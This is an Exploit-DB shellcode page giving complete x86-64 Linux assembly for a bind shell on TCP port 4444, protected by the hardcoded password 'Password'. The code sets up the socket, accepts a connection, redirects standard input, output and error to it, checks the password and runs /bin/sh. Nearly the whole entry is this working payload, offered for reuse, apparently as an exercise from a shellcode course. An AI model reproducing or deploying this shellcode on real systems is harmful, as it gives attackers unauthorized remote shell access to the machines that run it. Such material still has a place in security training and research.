Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)

EDB-ID:

43566

CVE:

N/A

EDB Verified:

Author:

Christophe G

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86-64

Date:

2009-01-01

Vulnerable App: 
;Bind_TCP 4444  with password                        ;
;Default password = Password                         ;
;If connected the shellcode no prompt for password   ;
;Enter password directly and you get the bin/sh shell;
;if password is wrong the shellcode exit:            ;
;Christophe G SLAE64 - 1337 size 173 bytes           ;



global _start



_start:
      

; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41 

push 0x29
pop rax
push 0x2
pop rdi
push 0x1
pop rsi
xchg rbx , rdx
syscall

; copy socket descriptor to rdi for future use 
xchg rax , rdi


; server.sin_family = AF_INET 
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)

xor rax, rax 

mov dword [rsp - 4] , eax
mov word [rsp - 6] ,0x5c11
mov byte [rsp - 8] , 0x2
sub rsp , 8


; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
push 0x31
pop rax
mov rsi, rsp
push 0x10
pop rdx
syscall


; listen(sock, MAX_CLIENTS)
; syscall number 50

push 0x32
pop rax
push 0x2
pop rsi 
syscall


; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; syscall number 43


push 0x2b
pop rax
sub rsp, 0x10
mov rsi, rsp
push 0x10
mov rdx, rsp

syscall

; store the client socket description 
mov r9, rax 

; close parent
push 0x3
pop rax
syscall





xchg rdi , r9
xor rsi , rsi

dup2:
    push 0x21
    pop rax
    syscall
    inc rsi
    cmp rsi , 0x2
    loopne dup2

CheckPass:
    xor rax , rax
    push 0x10
    pop rdx
    sub rsp , 16                 ; 16 bytes to receive user input 
    mov rsi , rsp
    xor edi , edi
    syscall                      ; system read function call
    mov rax , 0x64726f7773736150 ; "Password"
    lea rdi , [rel rsi]
    scasq
    jz Execve
    push 0x3c
    pop rax
    syscall





Execve:
    xor rax , rax
    mov rdx , rax 
    push rax

    mov rbx, 0x68732f2f6e69622f
    push rbx

    ; store /bin//sh address in RDI
    mov rdi, rsp

    ; Second NULL push
    push rax
                

    ; Push address of /bin//sh
    push rdi

    ; set RSI
    mov rsi, rsp

    ; Call the Execve syscall
    push 0x3b
    pop rax
    syscall
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services